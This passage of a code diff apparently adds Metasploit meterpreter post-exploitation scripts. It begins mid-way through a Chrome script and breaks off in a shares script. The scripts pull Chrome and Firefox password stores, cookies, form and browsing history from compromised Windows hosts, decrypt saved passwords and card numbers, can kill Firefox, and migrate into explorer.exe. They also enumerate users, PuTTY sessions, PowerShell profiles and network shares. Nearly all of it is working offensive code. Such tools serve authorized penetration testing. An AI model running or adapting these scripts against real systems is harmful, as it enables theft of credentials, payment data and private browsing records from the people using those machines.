+      f.write(rows.first.keys.join("\t") + "\n")
133
+      f.write(rows.map { |e| e.values.map(&:inspect).join("\t") }.join("\n"))
134
+    end
135
+  end
136
+end
137
+
138
+def process_files(username)
139
+  @chrome_files.each do |item|
140
+    in_file = File.join(@log_dir, Rex::FileUtils.clean_path(username), item[:in_file])
141
+    out_file = File.join(@log_dir, Rex::FileUtils.clean_path(username), item[:out_file])
142
+    if item[:sql]
143
+      db = SQLite3::Database.new(in_file)
144
+      columns, *rows = db.execute2(item[:sql])
145
+      db.close
146
+      rows.map! do |row|
147
+        res = Hash[*columns.zip(row).flatten]
148
+        if item[:encrypted_fields] && client.sys.config.getuid != "NT AUTHORITY\\SYSTEM"
149
+          if @host_info['Architecture'] !~ /x64/
150
+            item[:encrypted_fields].each do |field|
151
+              print_good("decrypting field '#{field}'...")
152
+              res[field + "_decrypted"] = decrypt_data(res[field])
153
+            end
154
+          else
155
+            print_error("Can not decrypt #{item[:out_file]}, decryption only supported in 32bit OS")
156
+          end
157
+        end
158
+        res
159
+      end
160
+      if rows.length > 0
161
+        print_status("writing output '#{item[:out_file]}'...")
162
+        write_output(out_file, rows)
163
+      else
164
+        print_status("no '#{item[:out_file]}' data found in file '#{item[:in_file]}'")
165
+      end
166
+    else
167
+      ::FileUtils.cp(in_file, out_file)
168
+    end
169
+  end
170
+end
171
+
172
+def extract_data(username)
173
+  chrome_path = @profiles_path + "\\" + username + @data_path
174
+  begin
175
+    client.fs.file.stat(chrome_path)
176
+  rescue
177
+    print_status("no files found for user '#{username}'")
178
+    return false
179
+  end
180
+
181
+  @chrome_files.map{ |e| e[:in_file] }.uniq.each do |f|
182
+    remote_path = chrome_path + '\\' + f
183
+    local_path = File.join(@log_dir, Rex::FileUtils.clean_path(username), f)
184
+    print_status("downloading file #{f} to '#{local_path}'...")
185
+    client.fs.file.download_file(local_path, remote_path)
186
+  end
187
+  return true
188
+end
189
+
190
+if @migrate
191
+  current_pid = client.sys.process.open.pid
192
+  target_pid = client.sys.process["explorer.exe"]
193
+  if target_pid != current_pid
194
+    @old_pid = current_pid
195
+    print_status("current PID is #{current_pid}. migrating into explorer.exe, PID=#{target_pid}...")
196
+    client.core.migrate(target_pid)
197
+    print_status("done.")
198
+  end
199
+end
200
+
201
+host = session.session_host
202
+@log_dir = File.join(Msf::Config.log_directory, "scripts", "enum_chrome", Rex::FileUtils.clean_path(@host_info['Computer']), Time.now.strftime("%Y%m%d.%H%M"))
203
+::FileUtils.mkdir_p(@log_dir)
204
+
205
+sysdrive = client.sys.config.getenv('SYSTEMDRIVE')
206
+os = @host_info['OS']
207
+if os =~ /(Windows 7|2008|Vista)/
208
+  @profiles_path = sysdrive + "\\Users\\"
209
+  @data_path = "\\AppData\\Local\\Google\\Chrome\\User Data\\Default"
210
+elsif os =~ /(2000|NET|XP)/
211
+  @profiles_path = sysdrive + "\\Documents and Settings\\"
212
+  @data_path = "\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default"
213
+end
214
+
215
+usernames = []
216
+
217
+uid = client.sys.config.getuid
218
+
219
+if is_system?
220
+  print_status "running as SYSTEM, extracting user list..."
221
+  print_status "(decryption of passwords and credit card numbers will not be possible)"
222
+  client.fs.dir.foreach(@profiles_path) do |u|
223
+    usernames << u if u !~ /^(\.|\.\.|All Users|Default|Default User|Public|desktop.ini|LocalService|NetworkService)$/
224
+  end
225
+  print_status "users found: #{usernames.join(", ")}"
226
+else
227
+  print_status "running as user '#{uid}'..."
228
+  usernames << client.sys.config.getenv('USERNAME')
229
+  prepare_railgun
230
+end
231
+
232
+usernames.each do |u|
233
+  print_status("extracting data for user '#{u}'...")
234
+  success = extract_data(u)
235
+  process_files(u) if success
236
+end
237
+
238
+if @migrate && @old_pid
239
+  print_status("migrating back into PID=#{@old_pid}...")
240
+  client.core.migrate(@old_pid)
241
+  print_status("done.")
242
+end
243
+
244
+raise Rex::Script::Completed

+ 292
- 0
scripts/meterpreter/enum_firefox.rb View File

@@ -0,0 +1,292 @@
1
+##
2
+# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
3
+# If you'd like to imporve this script, please try to port it as a post
4
+# module instead. Thank you.
5
+##
6
+
7
+
8
+#
9
+# Author: Carlos Perez at carlos_perez[at]darkoperator.com
10
+#-------------------------------------------------------------------------------
11
+################## Variable Declarations ##################
12
+require 'sqlite3'
13
+@client = client
14
+kill_frfx = false
15
+host,port = session.session_host, session.session_port
16
+# Create Filename info to be appended to downloaded files
17
+filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S")
18
+
19
+# Create a directory for the logs
20
+@logs = ::File.join(Msf::Config.config_directory, 'logs',"scripts", 'enum_firefox', host + filenameinfo )
21
+
22
+# logfile name
23
+logfile = @logs + "/" + host + filenameinfo + ".txt"
24
+notusrs = [
25
+  "Default",
26
+  "Default User",
27
+  "Public",
28
+  "LocalService",
29
+  "NetworkService",
30
+  "All Users"
31
+]
32
+#-------------------------------------------------------------------------------
33
+#Function for getting Firefox SQLite DB's
34
+def frfxplacesget(path,usrnm)
35
+  # Create the log
36
+  ::FileUtils.mkdir_p(@logs)
37
+  @client.fs.dir.foreach(path) {|x|
38
+    next if x =~ /^(\.|\.\.)$/
39
+    fullpath = path + '\\' + x
40
+    if @client.fs.file.stat(fullpath).directory?
41
+      frfxplacesget(fullpath,usrnm)
42
+    elsif fullpath =~ /(formhistory.sqlite|cookies.sqlite|places.sqlite|search.sqlite)/i
43
+      dst = x
44
+      dst = @logs + ::File::Separator + usrnm + dst
45
+      print_status("\tDownloading Firefox Database file #{x} to '#{dst}'")
46
+      @client.fs.file.download_file(dst, fullpath)
47
+    end
48
+  }
49
+
50
+end
51
+#-------------------------------------------------------------------------------
52
+#Function for processing the Firefox sqlite DB's
53
+def frfxdmp(usrnm)
54
+  sitesvisited = []
55
+  dnldsmade = []
56
+  bkmrks = []
57
+  cookies = []
58
+  formvals = ''
59
+  searches = ''
60
+  results = ''
61
+  placesdb = @logs + ::File::Separator + usrnm + "places.sqlite"
62
+  formdb = @logs + ::File::Separator + usrnm + "formhistory.sqlite"
63
+  searchdb = @logs + ::File::Separator + usrnm + "search.sqlite"
64
+  cookiesdb = @logs + ::File::Separator + usrnm + "cookies.sqlite"
65
+  bookmarks = @logs + ::File::Separator + usrnm + "_bookmarks.txt"
66
+  download_list = @logs + ::File::Separator + usrnm + "_download_list.txt"
67
+  url_history = @logs + ::File::Separator + usrnm + "_history.txt"
68
+  form_history = @logs + ::File::Separator + usrnm + "_form_history.txt"
69
+  search_history = @logs + ::File::Separator + usrnm + "_search_history.txt"
70
+  begin
71
+    print_status("\tGetting Firefox Bookmarks for #{usrnm}")
72
+    db = SQLite3::Database.new(placesdb)
73
+    #print_status("\tProcessing #{placesdb}")
74
+
75
+    db.execute('select a.url from moz_places a, moz_bookmarks b, '+
76
+      'moz_bookmarks_roots c where a.id=b.fk and parent=2'+
77
+      ' and folder_id=2 and a.hidden=0') do |row|
78
+      bkmrks << row
79
+    end
80
+    print_status("\tSaving to #{bookmarks}")
81
+    if bkmrks.length != 0
82
+      bkmrks.each do |b|
83
+        file_local_write(bookmarks,"\t#{b.to_s}\n")
84
+      end
85
+    else
86
+      print_status("\tIt appears that there are no bookmarks for this account")
87
+    end
88
+  rescue::Exception => e
89
+    print_status("The following Error was encountered: #{e.class} #{e}")
90
+  end
91
+  #--------------------------------------------------------------------------
92
+  begin
93
+    print_status("\tGetting list of Downloads using Firefox made by #{usrnm}")
94
+    db.execute('SELECT url FROM moz_places, moz_historyvisits ' +
95
+      'WHERE moz_places.id = moz_historyvisits.place_id '+
96
+      'AND visit_type = "7" ORDER by visit_date') do |row|
97
+      dnldsmade << row
98
+    end
99
+    print_status("\tSaving Download list to #{download_list}")
100
+    if dnldsmade.length != 0
101
+      dnldsmade.each do |d|
102
+        file_local_write(download_list,"\t#{d.to_s} \n")
103
+      end
104
+    else
105
+      print_status("\tIt appears that downloads where cleared for this account")
106
+    end
107
+  rescue::Exception => e
108
+    print_status("The following Error was encountered: #{e.class} #{e}")
109
+  end
110
+  #--------------------------------------------------------------------------
111
+  begin
112
+    print_status("\tGetting Firefox URL History for #{usrnm}")
113
+    db.execute('SELECT DISTINCT url FROM moz_places, moz_historyvisits ' +
114
+      'WHERE moz_places.id = moz_historyvisits.place_id ' +
115
+      'AND visit_type = "1" ORDER by visit_date' ) do |row|
116
+      sitesvisited << row
117
+    end
118
+    print_status("\tSaving URL History to #{url_history}")
119
+    if sitesvisited.length != 0
120
+      sitesvisited.each do |s|
121
+        file_local_write(url_history,"\t#{s.to_s}\n")
122
+      end
123
+    else
124
+      print_status("\tIt appears that Browser History has been cleared")
125
+    end
126
+    db.close
127
+  rescue::Exception => e
128
+    print_status("The following Error was encountered: #{e.class} #{e}")
129
+  end
130
+  #--------------------------------------------------------------------------
131
+  begin
132
+    print_status("\tGetting Firefox Form History for #{usrnm}")
133
+    db = SQLite3::Database.new(formdb)
134
+    #print_status("\tProcessing #{formdb}")
135
+    db.execute("SELECT fieldname,value FROM moz_formhistory") do |row|
136
+      formvals << "\tField: #{row[0]} Value: #{row[1]}\n"
137
+    end
138
+    print_status("\tSaving Firefox Form History to #{form_history}")
139
+    if formvals.length != 0
140
+      file_local_write(form_history,formvals)
141
+    else
142
+      print_status("\tIt appears that Form History has been cleared")
143
+    end
144
+    db.close
145
+  rescue::Exception => e
146
+    print_status("The following Error was encountered: #{e.class} #{e}")
147
+  end
148
+
149
+  begin
150
+    print_status("\tGetting Firefox Search History for #{usrnm}")
151
+    db = SQLite3::Database.new(searchdb)
152
+    #print_status("\tProcessing #{searchdb}")
153
+    db.execute("SELECT name,value FROM engine_data") do |row|
154
+      searches << "\tField: #{row[0]} Value: #{row[1]}\n"
155
+    end
156
+    print_status("\tSaving Firefox Search History to #{search_history}")
157
+    if searches.length != 0
158
+      file_local_write(search_history,searches)
159
+    else
160
+      print_status("\tIt appears that Search History has been cleared")
161
+    end
162
+    db.close
163
+  rescue::Exception => e
164
+    print_status("The following Error was encountered: #{e.class} #{e}")
165
+  end
166
+  # Create Directory for dumping Firefox cookies
167
+  ckfldr = ::File.join(@logs,"firefoxcookies_#{usrnm}")
168
+  ::FileUtils.mkdir_p(ckfldr)
169
+  db = SQLite3::Database.new(cookiesdb)
170
+  db.results_as_hash = true
171
+  print_status("\tGetting Firefox Cookies for #{usrnm}")
172
+  db.execute("SELECT * FROM moz_cookies;" ) do |item|
173
+    fd = ::File.new(ckfldr + ::File::Separator + item['id'].to_s + "_" + item['host'].to_s + ".txt", "w+")
174
+    fd.puts "Name: " + item['name'] + "\n"
175
+    fd.puts "Value: " + item['value'].to_s + "\n"
176
+    fd.puts "Host: " + item['host'] + "\n"
177
+    fd.puts "Path: " + item['path'] + "\n"
178
+    fd.puts "Expiry: " + item['expiry'].to_s + "\n"
179
+    fd.puts "lastAccessed: " + item['lastAccessed'].to_s + "\n"
180
+    fd.puts "isSecure: " + item['isSecure'].to_s + "\n"
181
+    fd.puts "isHttpOnly: " + item['isHttpOnly'].to_s + "\n"
182
+    fd.close
183
+  end
184
+  return results
185
+end
186
+#-------------------------------------------------------------------------------
187
+#Function for getting password files
188
+def frfxpswd(path,usrnm)
189
+  @client.fs.dir.foreach(path) {|x|
190
+    next if x =~ /^(\.|\.\.)$/
191
+    fullpath = path + '\\' + x
192
+
193
+    if @client.fs.file.stat(fullpath).directory?
194
+      frfxpswd(fullpath,usrnm)
195
+    elsif fullpath =~ /(cert8.db|signons.sqlite|signons3.txt|key3.db)/i
196
+      begin
197
+        dst = x
198
+        dst = @logs + ::File::Separator + usrnm + dst
199
+        print_status("\tDownloading Firefox Password file to '#{dst}'")
200
+        @client.fs.file.download_file(dst, fullpath)
201
+      rescue
202
+        print_error("\t******Failed to download file #{x}******")
203
+        print_error("\t******Browser could be running******")
204
+      end
205
+    end
206
+  }
207
+
208
+end
209
+#-------------------------------------------------------------------------------
210
+# Function for checking if Firefox is installed
211
+def frfxchk
212
+  found = false
213
+  registry_enumkeys("HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall").each do |a|
214
+    if a =~ /Firefox/
215
+      print_status("Firefox was found on this system.")
216
+      found = true
217
+    end
218
+  end
219
+  return found
220
+end
221
+#-------------------------------------------------------------------------------
222
+#Function for executing all pilfering actions for Firefox
223
+def frfxpilfer(frfoxdbloc,session,logs,usrnm,logfile)
224
+  print_status("Getting Firefox information for user #{usrnm}")
225
+  frfxplacesget(frfoxdbloc,usrnm)
226
+  frfxpswd(frfoxdbloc,usrnm)
227
+  file_local_write(logfile,frfxdmp(usrnm))
228
+end
229
+
230
+# Function to kill Firefox if open
231
+def kill_firefox
232
+  print_status("Killing the Firefox Process if open...")
233
+  @client.sys.process.get_processes().each do |x|
234
+    if x['name'].downcase == "firefox.exe"
235
+      print_status("\tFirefox Process found #{x['name']} #{x['pid']}")
236
+      print_status("\tKilling process .....")
237
+      session.sys.process.kill(x['pid'])
238
+    end
239
+  end
240
+end
241
+####################### Options ###########################
242
+@@exec_opts = Rex::Parser::Arguments.new(
243
+  "-h" => [ false, "Help menu." ],
244
+  "-k" => [ false, "Kill Firefox processes before downloading databases for enumeration."]
245
+
246
+)
247
+@@exec_opts.parse(args) { |opt, idx, val|
248
+  case opt
249
+  when "-h"
250
+    print_line "Meterpreter Script for extracting Firefox Browser."
251
+    print_line(@@exec_opts.usage)
252
+    raise Rex::Script::Completed
253
+  when "-k"
254
+    kill_frfx = true
255
+  end
256
+}
257
+if client.platform =~ /win32|win64/
258
+  if frfxchk
259
+    user = @client.sys.config.getuid
260
+    if not is_system?
261
+      envs = @client.sys.config.getenvs('USERNAME', 'APPDATA')
262
+      usrname = envs['USERNAME']
263
+      db_path = envs['APPDATA'] + "\\Mozilla\\Firefox\\Profiles"
264
+      if kill_frfx
265
+        kill_firefox
266
+      end
267
+      print_status("Extracting Firefox data for user #{usrname}")
268
+      frfxpswd(db_path,usrname)
269
+      frfxplacesget(db_path,usrname)
270
+      frfxdmp(usrname)
271
+    else
272
+      registry_enumkeys("HKU").each do |sid|
273
+        if sid =~ /S-1-5-21-\d*-\d*-\d*-\d{4}$/
274
+          key_base = "HKU\\#{sid}"
275
+          usrname = Rex::FileUtils.clean_path(registry_getvaldata("#{key_base}\\Volatile Environment","USERNAME"))
276
+          db_path = registry_getvaldata("#{key_base}\\Volatile Environment","APPDATA") + "\\Mozilla\\Firefox\\Profiles"
277
+          if kill_frfx
278
+            kill_firefox
279
+          end
280
+          print_status("Extracting Firefox data for user #{usrname}")
281
+          frfxpswd(db_path,usrname)
282
+          frfxplacesget(db_path,usrname)
283
+          frfxdmp(usrname)
284
+        end
285
+      end
286
+    end
287
+
288
+  end
289
+else
290
+  print_error("This version of Meterpreter is not supported with this Script!")
291
+  raise Rex::Script::Completed
292
+end

+ 101
- 0
scripts/meterpreter/enum_logged_on_users.rb View File

@@ -0,0 +1,101 @@
1
+##
2
+# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
3
+# If you'd like to imporve this script, please try to port it as a post
4
+# module instead. Thank you.
5
+##
6
+
7
+
8
+# Author: Carlos Perez at carlos_perez[at]darkoperator.com
9
+#-------------------------------------------------------------------------------
10
+################## Variable Declarations ##################
11
+@client = client
12
+#-------------------------------------------------------------------------------
13
+
14
+######################## Functions ########################
15
+def ls_logged
16
+  sids = []
17
+  sids << registry_enumkeys("HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\ProfileList")
18
+  tbl = Rex::Text::Table.new(
19
+      'Header'  => "Logged Users",
20
+      'Indent'  => 1,
21
+      'Columns' =>
22
+        [
23
+          "SID",
24
+          "Profile Path"
25
+        ])
26
+  sids.flatten.each do |sid|
27
+    profile_path = registry_getvaldata("HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\ProfileList\\#{sid}","ProfileImagePath")
28
+    tbl << [sid,profile_path]
29
+  end
30
+  print_line("\n" + tbl.to_s + "\n")
31
+end
32
+
33
+def ls_current
34
+  key_base, username = "",""
35
+  tbl = Rex::Text::Table.new(
36
+      'Header'  => "Current Logged Users",
37
+      'Indent'  => 1,
38
+      'Columns' =>
39
+        [
40
+          "SID",
41
+          "User"
42
+        ])
43
+  registry_enumkeys("HKU").each do |sid|
44
+    case sid
45
+    when "S-1-5-18"
46
+      username = "SYSTEM"
47
+      tbl << [sid,username]
48
+    when "S-1-5-19"
49
+      username = "Local Service"
50
+      tbl << [sid,username]
51
+    when "S-1-5-20"
52
+      username = "Network Service"
53
+      tbl << [sid,username]
54
+    else
55
+      if sid =~ /S-1-5-21-\d*-\d*-\d*-\d*$/
56
+      key_base = "HKU\\#{sid}"
57
+      os = @client.sys.config.sysinfo['OS']
58
+      if os =~ /(Windows 7|2008|Vista)/
59
+        username = registry_getvaldata("#{key_base}\\Volatile Environment","USERNAME")
60
+      elsif os =~ /(2000|NET|XP)/
61
+        appdata_var = registry_getvaldata("#{key_base}\\Volatile Environment","APPDATA")
62
+        username = ''
63
+        if appdata_var =~ /^\w\:\D*\\(\D*)\\\D*$/
64
+          username = $1
65
+        end
66
+      end
67
+      tbl << [sid,username]
68
+      end
69
+    end
70
+  end
71
+  print_line("\n" + tbl.to_s + "\n")
72
+end
73
+#-------------------------------------------------------------------------------
74
+####################### Options ###########################
75
+@@exec_opts = Rex::Parser::Arguments.new(
76
+  "-h" => [ false, "Help menu." ],
77
+  "-l" => [ false, "List SID's of users who have loged in to the host." ],
78
+  "-c" => [ false, "List SID's of currently loged on users." ]
79
+  )
80
+@@exec_opts.parse(args) { |opt, idx, val|
81
+  case opt
82
+  when "-h"
83
+    print_line "Meterpreter Script for enumerating Current logged users and users that have loged in to the system."
84
+    print_line(@@exec_opts.usage)
85
+    raise Rex::Script::Completed
86
+  when "-l"
87
+    ls_logged
88
+  when "-c"
89
+    ls_current
90
+  end
91
+}
92
+if client.platform =~ /win32|win64/
93
+  if args.length == 0
94
+    print_line "Meterpreter Script for enumerating Current logged users and users that have loged in to the system."
95
+    print_line(@@exec_opts.usage)
96
+    raise Rex::Script::Completed
97
+  end
98
+else
99
+  print_error("This version of Meterpreter is not supported with this Script!")
100
+  raise Rex::Script::Completed
101
+end

+ 132
- 0
scripts/meterpreter/enum_powershell_env.rb View File

@@ -0,0 +1,132 @@
1
+##
2
+# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
3
+# If you'd like to imporve this script, please try to port it as a post
4
+# module instead. Thank you.
5
+##
6
+
7
+
8
+#Meterpreter script for enumerating Microsoft Powershell settings.
9
+#Provided by Carlos Perez at carlos_perez[at]darkoperator[dot]com
10
+@client = client
11
+
12
+@@exec_opts = Rex::Parser::Arguments.new(
13
+  "-h" => [ false,"Help menu." ]
14
+)
15
+
16
+@@exec_opts.parse(args) { |opt, idx, val|
17
+  case opt
18
+  when "-h"
19
+    print_line("enum_scripting_env -- Enumerates PowerShell and WSH Configurations")
20
+    print_line("USAGE: run enum_scripting_env")
21
+    print_line(@@exec_opts.usage)
22
+    raise Rex::Script::Completed
23
+  end
24
+}
25
+#Support Functions
26
+#-------------------------------------------------------------------------------
27
+def enum_users
28
+  os = @client.sys.config.sysinfo['OS']
29
+  users = []
30
+  user = @client.sys.config.getuid
31
+  path4users = ""
32
+  sysdrv = @client.sys.config.getenv('SystemDrive')
33
+
34
+  if os =~ /Windows 7|Vista|2008/
35
+    path4users = sysdrv + "\\Users\\"
36
+    profilepath = "\\Documents\\WindowsPowerShell\\"
37
+  else
38
+    path4users = sysdrv + "\\Documents and Settings\\"
39
+    profilepath = "\\My Documents\\WindowsPowerShell\\"
40
+  end
41
+
42
+  if is_system?
43
+    print_status("Running as SYSTEM extracting user list..")
44
+    @client.fs.dir.foreach(path4users) do |u|
45
+      userinfo = {}
46
+      next if u =~ /^(\.|\.\.|All Users|Default|Default User|Public|desktop.ini|LocalService|NetworkService)$/
47
+      userinfo['username'] = u
48
+      userinfo['userappdata'] = path4users + u + profilepath
49
+      users << userinfo
50
+    end
51
+  else
52
+    userinfo = {}
53
+    uservar = @client.sys.config.getenv('USERNAME')
54
+    userinfo['username'] = uservar
55
+    userinfo['userappdata'] = path4users + uservar + profilepath
56
+    users << userinfo
57
+  end
58
+  return users
59
+end
60
+
61
+
62
+
63
+#-------------------------------------------------------------------------------
64
+def enum_powershell
65
+  #Check if PowerShell is Installed
66
+  if registry_enumkeys("HKLM\\SOFTWARE\\Microsoft\\").include?("PowerShell")
67
+    print_status("Powershell is Installed on this system.")
68
+    powershell_version = registry_getvaldata("HKLM\\SOFTWARE\\Microsoft\\PowerShell\\1\\PowerShellEngine","PowerShellVersion")
69
+    print_status("Version: #{powershell_version}")
70
+    #Get PowerShell Execution Policy
71
+    begin
72
+      powershell_policy = registry_getvaldata("HKLM\\SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell","ExecutionPolicy")
73
+    rescue
74
+      powershell_policy = "Restricted"
75
+    end
76
+    print_status("Execution Policy: #{powershell_policy}")
77
+    powershell_path = registry_getvaldata("HKLM\\SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell","Path")
78
+    print_status("Path: #{powershell_path}")
79
+    if registry_enumkeys("HKLM\\SOFTWARE\\Microsoft\\PowerShell\\1").include?("PowerShellSnapIns")
80
+      print_status("Powershell Snap-Ins:")
81
+      registry_enumkeys("HKLM\\SOFTWARE\\Microsoft\\PowerShell\\1\\PowerShellSnapIns").each do |si|
82
+        print_status("\tSnap-In: #{si}")
83
+        registry_enumvals("HKLM\\SOFTWARE\\Microsoft\\PowerShell\\1\\PowerShellSnapIns\\#{si}").each do |v|
84
+          print_status("\t\t#{v}: #{registry_getvaldata("HKLM\\SOFTWARE\\Microsoft\\PowerShell\\1\\PowerShellSnapIns\\#{si}",v)}")
85
+        end
86
+      end
87
+    else
88
+      print_status("No PowerShell Snap-Ins are installed")
89
+
90
+    end
91
+    if powershell_version =~ /2./
92
+      print_status("Powershell Modules:")
93
+      powershell_module_path = @client.sys.config.getenv('PSModulePath')
94
+      @client.fs.dir.foreach(powershell_module_path) do |m|
95
+        next if m =~ /^(\.|\.\.)$/
96
+        print_status("\t#{m}")
97
+      end
98
+    end
99
+    tmpout = []
100
+    print_status("Checking if users have Powershell profiles")
101
+    enum_users.each do |u|
102
+      print_status("Checking #{u['username']}")
103
+      begin
104
+      @client.fs.dir.foreach(u["userappdata"]) do |p|
105
+        next if p =~ /^(\.|\.\.)$/
106
+        if p =~ /Microsoft.PowerShell_profile.ps1/
107
+          ps_profile = session.fs.file.new("#{u["userappdata"]}Microsoft.PowerShell_profile.ps1", "rb")
108
+          until ps_profile.eof?
109
+            tmpout << ps_profile.read
110
+          end
111
+          ps_profile.close
112
+          if tmpout.length == 1
113
+            print_status("Profile for #{u["username"]} not empty, it contains:")
114
+            tmpout.each do |l|
115
+              print_status("\t#{l.strip}")
116
+            end
117
+          end
118
+        end
119
+      end
120
+      rescue
121
+      end
122
+    end
123
+
124
+
125
+  end
126
+end
127
+if client.platform =~ /win32|win64/
128
+  enum_powershell
129
+else
130
+  print_error("This version of Meterpreter is not supported with this Script!")
131
+  raise Rex::Script::Completed
132
+end

+ 104
- 0
scripts/meterpreter/enum_putty.rb View File

@@ -0,0 +1,104 @@
1
+##
2
+# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
3
+# If you'd like to imporve this script, please try to port it as a post
4
+# module instead. Thank you.
5
+##
6
+
7
+
8
+#
9
+# Meterpreter script for enumerating putty connections
10
+# Provided by Carlos Perez at carlos_perez[at]darkoperator[dot]com
11
+#
12
+@client = client
13
+#Options and Option Parsing
14
+opts = Rex::Parser::Arguments.new(
15
+  "-h" => [ false, "Help menu." ]
16
+)
17
+
18
+opts.parse(args) { |opt, idx, val|
19
+  case opt
20
+  when "-h"
21
+    print_line "Meterpreter Script for enumerating Putty Configuration."
22
+    print_line(opts.usage)
23
+    raise Rex::Script::Completed
24
+  end
25
+}
26
+
27
+def hkcu_base
28
+  key_base = []
29
+
30
+  if not is_system?
31
+    key_base << "HKCU"
32
+  else
33
+    key = "HKU\\"
34
+    root_key, base_key = @client.sys.registry.splitkey(key)
35
+    open_key = @client.sys.registry.open_key(root_key, base_key)
36
+    keys = open_key.enum_key
37
+    keys.each do |k|
38
+      if k =~ /S-1-5-21-\d*-\d*-\d*-\d*$/
39
+        key_base << "HKU\\#{k}"
40
+      end
41
+    end
42
+  end
43
+  return key_base
44
+end
45
+def check_putty(reg_key_base)
46
+  installed = false
47
+  app_list = []
48
+  app_list = registry_enumkeys("#{reg_key_base}\\Software")
49
+  os = @client.sys.config.sysinfo['OS']
50
+  if os =~ /(Windows 7|2008|Vista)/
51
+    username_profile = registry_getvaldata("#{reg_key_base}\\Volatile Environment","USERNAME")
52
+  elsif os =~ /(2000|NET|XP)/
53
+    appdata_var = registry_getvaldata("#{reg_key_base}\\Volatile Environment","APPDATA")
54
+    username_profile = appdata_var.scan(/^\w\:\D*\\(\D*)\\\D*$/)
55
+  end
56
+  if app_list.index("SimonTatham")
57
+    print_status("Putty Installed for #{username_profile}")
58
+    installed = true
59
+  end
60
+  return installed
61
+end
62
+
63
+def enum_known_ssh_hosts(reg_key_base)
64
+  print_status("Saved SSH Server Public Keys:")
65
+  registry_enumvals("#{reg_key_base}\\Software\\SimonTatham\\PuTTY\\SshHostKeys").each do |host|
66
+    print_status("\t#{host}")
67
+  end
68
+end
69
+
70
+def enum_saved_sessions(reg_key_base)
71
+  saved_sessions = []
72
+  sessions_protocol = ""
73
+  sessions_key = "#{reg_key_base}\\Software\\SimonTatham\\PuTTY\\Sessions"
74
+  saved_sessions = registry_enumkeys(sessions_key)
75
+  if saved_sessions.length > 0
76
+    saved_sessions.each do |saved_session|
77
+      print_status("Session #{saved_session}:")
78
+      sessions_protocol = registry_getvaldata(sessions_key+"\\"+saved_session,"Protocol")
79
+      if sessions_protocol =~ /ssh/
80
+        print_status("\tProtocol: SSH")
81
+        print_status("\tHostname: #{registry_getvaldata(sessions_key+"\\"+saved_session,"HostName")}")
82
+        print_status("\tUsername: #{registry_getvaldata(sessions_key+"\\"+saved_session,"UserName")}")
83
+        print_status("\tPublic Key: #{registry_getvaldata(sessions_key+"\\"+saved_session,"PublicKeyFile")}")
84
+      elsif sessions_protocol =~ /serial/
85
+        print_status("\tProtocol: Serial")
86
+        print_status("\tSerial Port: #{registry_getvaldata(sessions_key+"\\"+saved_session,"SerialLine")}")
87
+        print_status("\tSpeed: #{registry_getvaldata(sessions_key+"\\"+saved_session,"SerialSpeed")}")
88
+        print_status("\tData Bits: #{registry_getvaldata(sessions_key+"\\"+saved_session,"SerialDataBits")}")
89
+        print_status("\tFlow Control: #{registry_getvaldata(sessions_key+"\\"+saved_session,"SerialFlowControl")}")
90
+      end
91
+    end
92
+  end
93
+end
94
+if client.platform =~ /win32|win64/
95
+  hkcu_base.each do |hkb|
96
+    if check_putty(hkb)
97
+      enum_known_ssh_hosts(hkb)
98
+      enum_saved_sessions(hkb)
99
+    end
100
+  end
101
+else
102
+  print_error("This version of Meterpreter is not supported with this Script!")
103
+  raise Rex::Script::Completed
104
+end

+ 124
- 0
scripts/meterpreter/enum_shares.rb View File

@@ -0,0 +1,124 @@
1
+##
2
+# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
3
+# If you'd like to imporve this script, please try to port it as a post
4
+# module instead. Thank you.
5
+##
6
+
7
+
8
+
9
+# Author: Carlos Perez at carlos_perez[at]darkoperator.com
10
+#-------------------------------------------------------------------------------
11
+################## Variable Declarations ##################
12
+opts = Rex::Parser::Arguments.new(
13
+  "-h" => [ false, "Help menu." ]
14
+  )
15
+
16
+opts.parse(args) { |opt, idx, val|
17
+  case opt
18
+  when "-h"
19
+    print_line "Meterpreter Script for Enumerating Shares Offered, History of Mounted Shares,"
20
+    print_line "History of UNC Paths entered in Run Dialog."
21
+    print_line(opts.usage)
22
+    raise Rex::Script::Completed
23
+  end
24
+}
25
+
26
+# Function for enumerating recent mapped drives on target machine
27
+def enum_recent_mounts(base_key)
28
+  recent_mounts = []
29
+  partial_path = base_key + '\Software\\Microsoft\Windows\CurrentVersion\Explorer'
30
+  full_path = "#{partial_path}\\Map Network Drive MRU"
31
+  explorer_keys = registry_enumkeys(partial_path)
32
+  if explorer_keys.include?("Map Network Drive MRU")
33
+    registry_enumvals(full_path).each do |k|
34
+      if not k =~ /MRUList/
35
+        recent_mounts << registry_getvaldata(full_path,k)
36
+      end
37
+    end
38
+  end
39
+  return recent_mounts
40
+end
41
+
42
+# Function for enumerating UNC Paths entered in run dialog box
43
+def enum_run_unc(base_key)
44
+  unc_paths = []
45
+  full_path = base_key + '\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU'
46
+  registry_enumvals(full_path).each do |k|
47
+    if k =~ /./
48
+      run_entrie = registry_getvaldata(full_path,k)
49
+      unc_paths << run_entrie if run_entrie =~ /^\\\\/
50
+    end
51
+  end
52
+  return unc_paths
53
+end
54
+
55
+def enum_conf_shares()
56
+  target_os = client.sys.config.sysinfo['OS']
57
+  if target_os =~ /Windows 7|Vista|2008/
58
+    shares_key = 'HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\services\\LanmanServer\\Shares'
59
+  else
60
+    shares_key = 'HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\services\\lanmanserver\\Shares'
61
+  end
62
+  shares = registry_enumvals(shares_key)
63
+  if shares.length > 0
64
+    print_status()
65
+    print_status("The following shares where found:")
66
+    shares.each do |s|
67
+      share_info = registry_getvaldata(shares_key,s).split("\000")
68
+      print_status("\tName: #{s}")
69
+      share_info.each do |e|
70
+        name,val = e.split("=")
71
